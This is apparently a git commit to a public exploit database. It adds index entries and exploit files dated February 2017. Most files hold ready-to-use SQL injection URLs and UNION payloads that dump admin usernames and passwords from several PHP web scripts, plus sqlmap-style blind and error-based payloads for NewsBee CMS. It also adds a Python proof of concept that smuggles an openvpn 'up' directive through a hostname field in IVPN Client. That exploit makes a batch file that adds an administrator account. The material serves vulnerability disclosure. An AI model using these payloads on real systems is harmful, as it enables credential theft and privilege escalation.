DB: 2017-02-07

13 new exploits IVPN Client 2.6.1 - Privilege Escalation Questions and Answers Script 1.1.3 - SQL Injection Questions and Answers Script 1.1.3 - 'id' Parameter SQL Injection ThisIsWhyImBroke Clone Script 4.0 - 'id' Parameter SQL Injection Upworthy Clone Script 1.1.0 - 'id' Parameter SQL Injection Ultimate Viral Media Script 1.0 - 'id' Parameter SQL Injection Visual Link Sharing Websites Builder Script 2.1.0 - SQL Injection ThisIsWhyImBroke Clone Script 4.0.0 - 'id' Parameter SQL Injection Funny Image and Video Script 2.0.0 - 'id' Parameter SQL Injection Clone Script Directory Script 1.1.0 - 'cid' Parameter SQL Injection Viral Pictures and Video Script 2.0.0 - 'id' Parameter SQL Injection NewsBee CMS - SQL Injection Web Inspiration Gallery Script 1.0.0 - 'id' Parameter SQL Injection Viral Fun Facts Sharing Script 1.1.0 - 'id' Parameter SQL Injection Questions and Answers Script 2.0.0 - 'cid' Parameter SQL Injection
2017-02-07 05:01:16 +00:00 · 2017-02-07 05:01:16 +00:00 · ebbc883f34
commit ebbc883f34
parent 565aa68240
14 changed files with 302 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -8788,6 +8788,7 @@ id,file,description,date,author,platform,type,port
 41217,platforms/android/local/41217.txt,"Google Android - RKP EL1 Code Loading Bypass",2017-02-01,"Google Security Research",android,local,0
 41221,platforms/windows/local/41221.txt,"Ghostscript 9.20 - 'Filename' Command Execution",2017-02-02,hyp3rlinx,windows,local,0
 41240,platforms/linux/local/41240.sh,"ntfs-3g (Debian 9) - Privilege Escalation",2017-02-03,"Kristian Erik Hermansen",linux,local,0
+41265,platforms/windows/local/41265.py,"IVPN Client 2.6.1 - Privilege Escalation",2017-02-06,"Kacper Szurek",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -37083,7 +37084,7 @@ id,file,description,date,author,platform,type,port
 41103,platforms/php/webapps/41103.txt,"NGO Directory Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
 41104,platforms/php/webapps/41104.txt,"Yoga and Fitness Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
 41105,platforms/php/webapps/41105.txt,"NGO Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
-41106,platforms/php/webapps/41106.txt,"Questions and Answers Script 1.1.3 - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41106,platforms/php/webapps/41106.txt,"Questions and Answers Script 1.1.3 - 'id' Parameter SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
 41107,platforms/php/webapps/41107.txt,"Online Mobile Recharge Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
 41108,platforms/php/webapps/41108.txt,"Clone of Oddee Script 1.1.3 - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
 41109,platforms/php/webapps/41109.txt,"Online Printing Business Clone Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
@ -37180,3 +37181,15 @@ id,file,description,date,author,platform,type,port
 41250,platforms/php/webapps/41250.txt,"Itech Job Portal Script 9.13 - Multiple Vulnerabilities",2017-02-04,Th3GundY,php,webapps,0
 41251,platforms/php/webapps/41251.txt,"iScripts AutoHoster 3.0 - 'siteid' Parameter SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0
 41252,platforms/php/webapps/41252.txt,"iScripts EasyCreate 3.2 - 'siteid' Parameter SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0
+41253,platforms/php/webapps/41253.txt,"ThisIsWhyImBroke Clone Script 4.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
+41254,platforms/php/webapps/41254.txt,"Upworthy Clone Script 1.1.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
+41255,platforms/php/webapps/41255.txt,"Ultimate Viral Media Script 1.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
+41256,platforms/php/webapps/41256.txt,"Visual Link Sharing Websites Builder Script 2.1.0 - SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
+41257,platforms/php/webapps/41257.txt,"ThisIsWhyImBroke Clone Script 4.0.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
+41258,platforms/php/webapps/41258.txt,"Funny Image and Video Script 2.0.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
+41259,platforms/php/webapps/41259.txt,"Clone Script Directory Script 1.1.0 - 'cid' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
+41260,platforms/php/webapps/41260.txt,"Viral Pictures and Video Script 2.0.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
+41261,platforms/php/webapps/41261.txt,"NewsBee CMS - SQL Injection",2017-02-06,"Kaan KAMIS",php,webapps,0
+41262,platforms/php/webapps/41262.txt,"Web Inspiration Gallery Script 1.0.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
+41263,platforms/php/webapps/41263.txt,"Viral Fun Facts Sharing Script 1.1.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
+41264,platforms/php/webapps/41264.txt,"Questions and Answers Script 2.0.0 - 'cid' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
--- a/platforms/php/webapps/41253.txt
+++ b/platforms/php/webapps/41253.txt
@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Flippy AffilatePlatform – ThisIsWhyImBroke Clone Script v4.0 - SQL Injection
+# Google Dork: N/A
+# Date: 06.02.2017
+# Vendor Homepage: https://www.flippyscripts.com/
+# Software Buy: https://www.flippyscripts.com/flippy-affilateplatform-affilate-site-builder-script/
+# Demo: http://ap.flippydemos.com/
+# Version: 4.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/listing.php?id=[SQL]
+-21+/*!50000union*/+select+1,version(),3,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),5,6,7,8,9,10,11,12,14,15,16,17
+# # # # #
--- a/platforms/php/webapps/41254.txt
+++ b/platforms/php/webapps/41254.txt
@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Flippy BuzzWorthy – Upworthy Clone Script v1.1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 06.02.2017
+# Vendor Homepage: https://www.flippyscripts.com/
+# Software Buy: https://www.flippyscripts.com/flippy-buzzworthy-upworthy-clone-script/
+# Demo: http://buzzworthy.flippydemos.com/
+# Version: 1.1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/post.php?id=[SQL]
+-267+/*!50000union*/+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
+# # # # #
--- a/platforms/php/webapps/41255.txt
+++ b/platforms/php/webapps/41255.txt
@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Flippy eXtremeViral – Ultimate Viral Media Script v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 06.02.2017
+# Vendor Homepage: https://www.flippyscripts.com/
+# Software Buy: https://www.flippyscripts.com/flippy-extremeviral-ultimate-viral-media-script/
+# Demo: http://eviral.flippyscripts.com/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/video.php?id=[SQL]
+# http://localhost/[PATH]/picture.php?id=[SQL]
+-9999+/*!50000union*/+select+1,concat_ws(0x3a,adminuser,0x3a,adminpassword,0x3c62723e494853414e2053454e43414e3c62723e7777772e696873616e2e6e6574),3,4,5,6,7,0x564552204159415249203a29,9,10,11,12,13,14,15,16+from+admin--
+# # # # #
--- a/platforms/php/webapps/41256.txt
+++ b/platforms/php/webapps/41256.txt
@ -0,0 +1,21 @@
+# # # # # 
+# Exploit Title: Flippy LinkShare – Visual Link Sharing Websites Builder Script v2.1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 06.02.2017
+# Vendor Homepage: https://www.flippyscripts.com/
+# Software Buy: https://www.flippyscripts.com/flippy-linkshare-visual-link-sharing-websites-builder/
+# Demo: http://linkshare2.flippydemos.com/
+# Version: 2.1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/profile.php?id=[SQL]
+# http://localhost/[PATH]/cat.php?cid=[SQL]
+# http://localhost/[PATH]/user_posts.php?id=[SQL]
+# Etc...
+# -9999+/*!50000union*/+select+1,2,3,4,concat_ws(0x3a,adminuser,0x3a,adminpassword),6,7,8,9,10,11,12,13,14,15+from+admin--
+# # # # #
--- a/platforms/php/webapps/41257.txt
+++ b/platforms/php/webapps/41257.txt
@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Flippy AffilatePlatform – ThisIsWhyImBroke Clone Script v4.0.0 - SQL Injection
+# Google Dork: N/A
+# Date: 06.02.2017
+# Vendor Homepage: https://www.flippyscripts.com/
+# Software Buy: https://www.flippyscripts.com/flippy-affilateplatform-affilate-site-builder-script/
+# Demo: http://ap.flippydemos.com/
+# Version: 4.0.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/listing.php?id=[SQL]
+# Etc...
+# -9999+/*!50000union*/+select+1,concat_ws(0x3a,adminuser,0x3a,adminpassword),3,0x494853414e2053454e43414e3c62723e7777772e696873616e2e6e6574,5,6,7,8,9,10,11,12,13,14,15,16+from+admin--
+# # # # #
--- a/platforms/php/webapps/41258.txt
+++ b/platforms/php/webapps/41258.txt
@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Flippy ChillOut – Funny Image and Video Script v2.0.0 - SQL Injection
+# Google Dork: N/A
+# Date: 06.02.2017
+# Vendor Homepage: https://www.flippyscripts.com/
+# Software Buy: https://www.flippyscripts.com/flippy-chillout-funny-image-and-video-script/
+# Demo: http://chillout.flippydemos.com/
+# Version: 2.0.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/post.php?id=[SQL]
+# Etc...
+# -9999+/*!50000union*/+select+concat_ws(0x3a,adminuser,0x3a,adminpassword),2,3,4,5,6,7,8,9,10,11+from+admin--
+# # # # #
--- a/platforms/php/webapps/41259.txt
+++ b/platforms/php/webapps/41259.txt
@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Flippy ScriptZone – Clone Script Directory Script v1.1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 06.02.2017
+# Vendor Homepage: https://www.flippyscripts.com/
+# Software Buy: https://www.flippyscripts.com/flippy-scriptzone-clone-script-directory-script/
+# Demo: http://scriptzone.flippyscripts.com/
+# Version: 1.1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/cat.php?cid=[SQL]
+# Etc...
+-9999'+/*!50000union*/+select+1,concat_ws(0x3a,adminuser,0x3a,adminpassword),3,4,0x494853414e2053454e43414e3c62723e7777772e696873616e2e6e6574,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+admin-- -
+# # # # #
--- a/platforms/php/webapps/41260.txt
+++ b/platforms/php/webapps/41260.txt
@ -0,0 +1,21 @@
+# # # # # 
+# Exploit Title: Flippy HotViral – Viral Pictures and Video Script v2.0.0 - SQL Injection
+# Google Dork: N/A
+# Date: 06.02.2017
+# Vendor Homepage: https://www.flippyscripts.com/
+# Software Buy: https://www.flippyscripts.com/flippy-hotviral-viral-funny-pictures-and-video-script/
+# Demo: http://hotviral.flippyscripts.com/
+# Version: 2.0.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/picture.php?id=[SQL]
+# 7-9999+/*!50000union*/+select+1,2,concat_ws(0x3a,adminuser,0x3a,adminpassword),4,5,6,7,8+from+admin-- -
+#
+# http://localhost/[PATH]/video.php?id=[SQL]
+# 7-9999+/*!50000union*/+select+1,concat_ws(0x3a,adminuser,0x3a,adminpassword),3,4,5,6,7,8+from+admin-- -
+# # # # #
--- a/platforms/php/webapps/41261.txt
+++ b/platforms/php/webapps/41261.txt
@ -0,0 +1,32 @@
+Exploit Title: NewsBee CMS – SQL Injection
+Date: 06.02.2017
+Software Link: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937?s_rank=2
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+
+Overview
+
+NewsBee is a Fully Featured News Site CMS (Content Management System). This CMS Includes almost everything you need to make a News Site easily and Creatively. The In build Features will help you to easily manage the site contents not only news articles, but also many other related contents which are commonly used in news sites.
+Vulnerabilities:
+
+SQL Injection
+
+URL : http://localhost/newsbee/30[payload]_news_thai_soccer_targets_asia_wide_goals.html
+
+Payload:
+---
+Parameter: #1* (URI)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: http://localhost/newsbee/30' AND 5694=5694 AND 'fpmw'='fpmw_news_thai_soccer_targets_asia_wide_goals.html
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: http://localhost/newsbee/30' AND (SELECT 4020 FROM(SELECT COUNT(*),CONCAT(0x717a767a71,(SELECT (ELT(4020=4020,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Tdxc'='Tdxc_news_thai_soccer_targets_asia_wide_goals.html
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 OR time-based blind
+    Payload: http://localhost/newsbee/30' OR SLEEP(5) AND 'VLvJ'='VLvJ_news_thai_soccer_targets_asia_wide_goals.html
+---
--- a/platforms/php/webapps/41262.txt
+++ b/platforms/php/webapps/41262.txt
@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Flippy Inspired – Web Inspiration Gallery Script v1.0.0 - SQL Injection
+# Google Dork: N/A
+# Date: 06.02.2017
+# Vendor Homepage: https://www.flippyscripts.com/
+# Software Buy: https://www.flippyscripts.com/flippy-inspired-web-inspiration-gallery-script/
+# Demo: http://inspired.flippydemos.com/
+# Version: 1.0.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/site.php?id=[SQL]
+# -9999+/*!50000union*/+select+concat_ws(0x3a,username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+administrator--
+# # # # #
--- a/platforms/php/webapps/41263.txt
+++ b/platforms/php/webapps/41263.txt
@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Flippy DamnFacts – Viral Fun Facts Sharing Script v1.1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 06.02.2017
+# Vendor Homepage: https://www.flippyscripts.com/
+# Software Buy: https://www.flippyscripts.com/flippy-damnfacts-viral-fun-facts-sharing-script/
+# Demo: http://damnfacts.flippydemos.com/
+# Version: 1.1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/fact.php?id=[SQL]
+# -9999+/*!50000union*/+select+1,concat_ws(0x3a,adminuser,0x3a,adminpassword),3,4,5,6,7,8,9,10,11,12+from+admin-- -
+# # # # #
--- a/platforms/php/webapps/41264.txt
+++ b/platforms/php/webapps/41264.txt
@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Flippy Answers – Questions and Answers Script v2.0.0 - SQL Injection
+# Google Dork: N/A
+# Date: 06.02.2017
+# Vendor Homepage: https://www.flippyscripts.com/
+# Software Buy: https://www.flippyscripts.com/flippy-answers-questions-and-answers-script/
+# Demo: http://answers.flippydemos.com/
+# Version: 2.0.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/category.php?cid=[SQL]
+# -9999+/*!50000union*/+select+1,concat_ws(0x3a,adminuser,0x3a,adminpassword),3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,adminuser,0x3a,adminpassword),14,15,16,17,18,19,20,21,23+from+admin-- -
+# # # # #
--- a/platforms/windows/local/41265.py
+++ b/platforms/windows/local/41265.py
@ -0,0 +1,48 @@
+# Exploit IVPN Client for Windows 2.6.6120.33863 Privilege Escalation
+# Date: 06.02.2017
+# Software Link: https://www.ivpn.net/
+# Exploit Author: Kacper Szurek
+# Contact: https://twitter.com/KacperSzurek
+# Website: https://security.szurek.pl/
+# Category: local
+ 
+1. Description
+
+It is possible to run `openvpn` as `SYSTEM` with custom openvpn.conf.
+
+Using `--up cmd` we can execute any command.
+
+https://security.szurek.pl/ivpn-client-for-windows-26612033863-privilege-escalation.html
+
+2. Proof of Concept
+
+import socket
+
+print "IVPN Client for Windows 2.6.6120.33863 Privilege Escalation"
+print "by Kacper Szurek"
+print "http://security.szurek.pl/"
+print "https://twitter.com/KacperSzurek"
+
+hostname = "is.gw.ivpn.net 2049"
+username = "your_username"
+password = "your_password"
+
+open(r'c:\\1\\test.bat', 'w').write('net user hacked /add\nnet localgroup administrators hacked /add')
+
+port = int(open(r"c:\Program Files\IVPN Client\etc\port.txt").read())
+
+a = r'{"$type":"IVPN.OpenVPNServer, IVPN.Core","id":"id","region":"region","country":"country","city":"city","hostnames":{"$type":"System.Collections.Generic.List`1[[System.String, mscorlib]], mscorlib","$values":["'+hostname+r'\r\nup c:\\\\\\\\1\\\\\\\\test.bat\r\nverb"]},"ports":{"$type":"System.Collections.Generic.List`1[[IVPN.OpenVPNServerPort, IVPN.Core]], mscorlib","$values":[{"$type":"IVPN.OpenVPNServerPort, IVPN.Core","protocol":1,"port":2000}]}}'
+
+b = r'{"$type":"IVPN.IVPNConnectRequest, IVPN.Core","entryServer":'+a+',"exitServer":'+a+',"username":"'+username+'","password":"'+password+'","portProtocol":{"$type":"IVPN.OpenVPNServerPort, IVPN.Core","protocol":1,"port":2000},"proxyType":"sth","proxyAddress":"proxyAddress","proxyPort":100,"proxyUsername":"proxyUsername","proxyPassword":"proxyPassword"}'
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(("127.0.0.1", port))
+s.send(b)
+
+print "OK"
+
+3. Solution
+
+Update to version 2.6.2
+
+https://www.ivpn.net/setup/windows-changelog.html